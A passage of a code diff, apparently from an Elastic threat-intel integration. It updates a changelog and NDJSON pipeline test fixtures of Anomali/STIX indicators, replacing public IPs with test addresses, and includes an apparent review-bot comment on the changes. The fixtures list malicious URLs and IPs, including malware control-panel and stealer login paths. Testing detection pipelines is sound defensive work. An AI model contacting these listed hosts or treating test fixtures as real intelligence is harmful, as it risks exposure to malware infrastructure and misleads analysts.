"state": "active", "detail2": "imported by user 134", "url": "https://6i0-utr.example.com/hsv/50qcugwt?xcl=ofr", "trusted_circle_ids": "125,279,552", "lat": -14.9, "maltype": "malware:cu6f11gp1", "value_type": "url", "source_feed_id": 1973, "date_first": "2020-10-09T18:44:45", "date_last": "2020-10-09T18:44:45", "resource_uri": "/api/v1/intelligence/P46535027346/"} +{"confidence": 94, "itype": "mal_ip", "severity": "high", "classification": "private", "srcip": "89.160.20.156", "country": "CN", "update_id": 2750333841, "detail": "first_seen=2020-11-23T17:11:50,IP=89.160.20.156,ail6s,q0n,mask=89.160.20.156,popularity=medium", "id": 1139990065, "source": "Default Organization", "state": "active", "detail2": "imported by user 914", "trusted_circle_ids": "610,346", "lat": -73.5, "maltype": "malware:9pyy91p7", "value_type": "ip", "source_feed_id": 2363, "date_first": "2020-10-09T18:44:47", "date_last": "2020-10-09T18:44:47", "resource_uri": "/api/v1/intelligence/P20277063326/"} +{"confidence": 69, "itype": "mal_domain", "severity": "medium", "classification": "public", "srcip": "89.160.20.156", "country": "HK", "update_id": 3315952704, "detail": "first_seen=2020-03-11T09:04:13,smh,0a3p,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=high", "id": 2453026318, "source": "Default Organization", "state": "active", "detail2": "imported by user 886", "domain": "ztpyt.example.org", "trusted_circle_ids": "391", "lat": -44.3, "maltype": "malware:c0-a", "value_type": "domain", "source_feed_id": 1281, "date_first": "2020-10-09T18:44:50", "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P26988858868/"} +{"confidence": 88, "itype": "mal_url", "severity": "very-high", "classification": "private", "url": "http://e5el.example.net/rncer/fky?8tc53bbz=1pd-6w5", "trusted_circle_ids": "806,75,258", "update_id": 3898530792, "detail": "first_seen=2020-07-17T00:42:30,sv5lmqoo,mdedohd,mask=192.168.2.22,popularity=high", "id": 3554643386, "source": "Default 
Organization", "state": "active", "detail2": "imported by user 268", "maltype": "malware:ai7s5vg01", "value_type": "url", "source_feed_id": 744, "date_first": "2020-10-09T18:44:50", "date_last": "2020-10-09T18:44:50", "resource_uri": "/api/v1/intelligence/P48225335605/"}
+{"confidence": 73, "itype": "phish_url", "severity": "low", "classification": "private", "srcip": "192.168.2.226", "country": "US", "update_id": 1423149268, "detail": "l019r8", "id": 2781657405, "source": "Default Organization", "state": "active", "detail2": "imported by user 737", "url": "http://eryz36i.example.net/9a86hdj/zti5r9fx?ahz=l7dsg01qo", "trusted_circle_ids": "259", "lat": -14.3, "maltype": "malware:6faja4zy-", "value_type": "url", "source_feed_id": 518, "date_first": "2020-10-09T18:44:54", "date_last": "2020-10-09T18:44:54", "resource_uri": "/api/v1/intelligence/P13788530147/"}
+{"confidence": 22, "itype": "phish_url", "severity": "medium", "classification": "private", "srcip": "192.168.2.25", "country": "US", "update_id": 2621256767, "detail": "4yqbj3b", "id": 1875325904, "source": "Default Organization", "state": "active", "detail2": "imported by user 703", "url": "http://i-pb.example.com/pjmy3/w0tgzb?noe1pr9=eiwcfihd", "trusted_circle_ids": "802,792,114", "lat": -67.0, "maltype": "malware:rrcnb", "value_type": "url", "source_feed_id": 417, "date_first": "2020-10-09T18:44:58", "date_last": "2020-10-09T18:44:58", "resource_uri": "/api/v1/intelligence/P12535858975/"}
+{"confidence": 19, "itype": "mal_ip", "severity": "very-high", "classification": "public", "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "country": "IN", "update_id": 1171583779, "detail": "first_seen=2020-12-01T02:16:04,IP=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,qqo5fg,j6vwgb6,mask=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6,popularity=medium", "id": 2684776210, "source": "Default Organization", "state": "active", "detail2": "imported by user 846", "trusted_circle_ids": "697,641", "lat": 47.5, "maltype": "malware:zfd", 
"value_type": "ip", "source_feed_id": 965, "date_first": "2020-10-09T18:45:05", "date_last": "2020-10-09T18:45:05", "resource_uri": "/api/v1/intelligence/P45743905551/"} +{"itype": "mal_ip", "classification": "public", "lat": 5.6, "update_id": 3651210157, "maltype": "malware:ib0ezg", "source_feed_id": 632, "date_first": "2021-04-07T13:10:07", "confidence": 14, "severity": "low", "trusted_circle_ids": "459,936", "lon": 112.8, "id": 1705726884, "source": "Default Organization", "state": "active", "import_session_id": 2813, "value_type": "ip", "srcip": "192.168.2.12", "org": "Level 3 Communications", "asn": "3356", "date_last": "2021-04-19T08:57:46", "country": "US", "detail2": "imported by user 812", "resource_uri": "/api/v1/intelligence/P12586136986/"} +{"confidence": 81, "itype": "apt_ip", "severity": "very-high", "classification": "private", "trusted_circle_ids": "474,601", "id": 1502608684, "source": "Default Organization", "state": "active", "detail2": "imported by user 411", "srcip": "89.160.20.156", "update_id": 1170853028, "value_type": "ip", "source_feed_id": 2891, "date_first": "2021-04-29T16:02:17", "date_last": "2021-04-29T16:02:17", "resource_uri": "/api/v1/intelligence/P46655498126/"} +{"confidence": 14, "itype": "ssh_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "749", "id": 1171635730, "source": "Default Organization", "state": "active", "detail2": "imported by user 601", "srcip": "192.168.2.68", "update_id": 1026394470, "value_type": "ip", "source_feed_id": 822, "date_first": "2021-04-29T16:02:23", "date_last": "2021-04-29T16:02:23", "resource_uri": "/api/v1/intelligence/P24647878518/"} +{"confidence": 70, "itype": "i2p_ip", "severity": "medium", "classification": "public", "trusted_circle_ids": "630,235", "id": 2251817936, "source": "Default Organization", "state": "active", "detail2": "imported by user 964", "srcip": "89.160.20.156", "update_id": 3118045359, "value_type": "ip", "source_feed_id": 3194, "date_first": 
"2021-04-29T16:02:24", "date_last": "2021-04-29T16:02:24", "resource_uri": "/api/v1/intelligence/P47421535249/"} +{"confidence": 77, "itype": "parked_ip", "severity": "low", "classification": "public", "trusted_circle_ids": "303,461", "id": 1966380326, "source": "Default Organization", "state": "active", "detail2": "imported by user 137", "srcip": "89.160.20.156", "update_id": 1757326916, "value_type": "ip", "source_feed_id": 229, "date_first": "2021-04-29T16:02:25", "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P19479436344/"} +{"confidence": 14, "itype": "tor_ip", "severity": "medium", "classification": "private", "trusted_circle_ids": "657,879,13", "id": 3377960871, "source": "Default Organization", "state": "active", "detail2": "imported by user 997", "srcip": "192.168.2.239", "update_id": 1469037378, "value_type": "ip", "source_feed_id": 1710, "date_first": "2021-04-29T16:02:25", "date_last": "2021-04-29T16:02:25", "resource_uri": "/api/v1/intelligence/P25503355951/"} +{"confidence": 12, "itype": "c2_ip", "severity": "high", "classification": "public", "trusted_circle_ids": "683,719", "update_id": 1541655552, "detail": "vjb9lmpcf", "id": 1049633552, "source": "Default Organization", "state": "active", "detail2": "imported by user 445", "srcip": "192.168.2.169", "maltype": "malware:tos5xne", "value_type": "ip", "source_feed_id": 274, "date_first": "2021-04-29T16:02:26", "date_last": "2021-04-29T16:02:26", "resource_uri": "/api/v1/intelligence/P17175297976/"} diff --git a/packages/ti_anomali/changelog.yml b/packages/ti_anomali/changelog.yml index 353770a4523..d1843399aea 100644 --- a/packages/ti_anomali/changelog.yml +++ b/packages/ti_anomali/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.1" changes: - description: Fixing typo in base-fields.yml
diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log
index 28d5b256ea9..bd86247666f 100644
--- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log
+++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log
@@ -1,18 +1,18 @@
 {"created":"2020-01-22T02:58:57.431Z","description":"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:58:57.431Z","name":"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.431Z"}
 {"created":"2020-01-22T02:58:57.503Z","description":"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:58:57.503Z","name":"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.503Z"}
 {"created":"2020-01-22T02:58:57.57Z","description":"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0e14122-9005-4776-99fc-00872476c6d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-22T02:58:57.57Z","name":"mal_url: http://f0387770.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387770.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:58:57.57Z"}
-{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: 
Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://178.62.187.103/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.187.103/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"}
+{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"}
 {"created":"2020-01-22T02:58:59.457Z","description":"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--189ce776-6d7e-4e85-9222-de5876644988","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T02:58:59.457Z","name":"mal_url: http://appareluea.com/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:58:59.457Z"}
 {"created":"2020-01-22T02:59:06.402Z","description":"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a4144d34-b86d-475e-8047-eb46b48ee325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T02:59:06.402Z","name":"mal_url: 
http://nkpotu.xyz/Kpot3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']","type":"indicator","valid_from":"2020-01-22T02:59:06.402Z"}
-{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 162.144.128.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.128.116']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"}
+{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"}
 {"created":"2020-01-22T02:59:20.155Z","description":"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-22T02:59:20.155Z","name":"mal_url: http://ntrcgroup.com/nze/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:20.155Z"}
 {"created":"2020-01-22T02:59:25.521Z","description":"TS ID: 
55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:59:25.521Z","name":"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:59:25.521Z"}
 {"created":"2020-01-22T02:59:25.626Z","description":"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:59:25.626Z","name":"mal_url: http://f0390764.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390764.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:25.626Z"}
-{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 45.143.138.39","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.138.39']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"}
+{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"}
 {"created":"2020-01-22T02:59:41.193Z","description":"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime","id":"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-22T02:59:41.193Z","name":"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:41.193Z"}
-{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://95.182.122.184/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.182.122.184/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"}
-{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 
198.54.115.121","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '198.54.115.121']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"}
-{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.185.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"}
+{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://89.160.20.156/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"}
+{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"}
+{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; 
Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.168.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"}
 {"created":"2020-01-22T02:59:51.442Z","description":"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:51.442Z","name":"mal_url: http://f0389246.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0389246.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:51.442Z"}
 {"created":"2020-01-22T03:00:01.563Z","description":"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--213519c9-f511-4188-89c8-159f35f08008","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T03:00:01.563Z","name":"mal_url: http://appareluea.com/server/cp.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/server/cp.php']","type":"indicator","valid_from":"2020-01-22T03:00:01.563Z"}
 {"created":"2020-01-22T03:00:03.138Z","description":"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:00:03.138Z","name":"mal_url: 
http://nkpotu.xyz/Kpot2/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.138Z"} 
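Review bot: The last changed record of this hunk (TS ID 55241332324) is moved to the private address 192.168.119.172 in both `name` and `pattern`, while every other mal_ip indicator in the hunk is moved to 89.160.20.156; if these fixtures exist to exercise geo/ASN enrichment, a private address yields no enrichment, so the regenerated expected output for that record should be checked for missing geo fields rather than accepted as-is. The same private-range substitution recurs in the `@@ -39,38` hunk (`192.168.214.199`, TS ID 55245868747), which starts in this chunk but ends outside it. Four indicators in this hunk now share the identical value 89.160.20.156 under distinct indicator ids, so any test that relied on distinct values per indicator (deduplication, fingerprinting) no longer discriminates them; giving at least one of them a second address from the supported test set would keep that coverage. The `description` strings still name the original hosting orgs (for example `Org: Digital Ocean`), which is harmless for a fixture but will not agree with whatever ASN the test database returns for the new address.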
@@ -23,14 +23,14 @@
 {"created":"2020-01-22T03:00:45.787Z","description":"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:00:45.787Z","name":"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.787Z"}
 {"created":"2020-01-22T03:00:45.841Z","description":"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime","id":"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-22T03:00:45.841Z","name":"mal_url: http://smartlinktelecom.top/kings/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.841Z"}
 {"created":"2020-01-22T03:00:45.959Z","description":"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--17777e7f-3e91-4446-a43d-79139de8a948","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-22T03:00:45.959Z","name":"mal_url: http://carirero.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://carirero.net/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.959Z"}
-{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; 
Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 74.116.84.20","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '74.116.84.20']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"}
+{"created":"2020-01-22T03:00:46.025Z","description":"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-01-22T03:00:46.025Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:00:46.025Z"}
 {"created":"2020-01-22T03:00:57.729Z","description":"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b4fd8489-9589-4f70-996c-84989245a21b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-01-22T03:00:57.729Z","name":"mal_url: http://tuu.nu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tuu.nu/login']","type":"indicator","valid_from":"2020-01-22T03:00:57.729Z"}
 {"created":"2020-01-22T03:01:02.696Z","description":"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime","id":"indicator--bc50c62f-a015-4460-87df-2137626877e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-01-22T03:01:02.696Z","name":"mal_url: 
http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.696Z"}
 {"created":"2020-01-22T03:01:02.807Z","description":"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-22T03:01:02.807Z","name":"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:01:02.807Z"}
 {"created":"2020-01-22T03:01:24.81Z","description":"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:01:24.81Z","name":"mal_url: http://nkpotu.xyz/Kpot1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']","type":"indicator","valid_from":"2020-01-22T03:01:24.81Z"}
-{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 
194.87.147.80","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.147.80']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"}
+{"created":"2020-01-22T03:01:41.158Z","description":"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:01:41.158Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:01:41.158Z"}
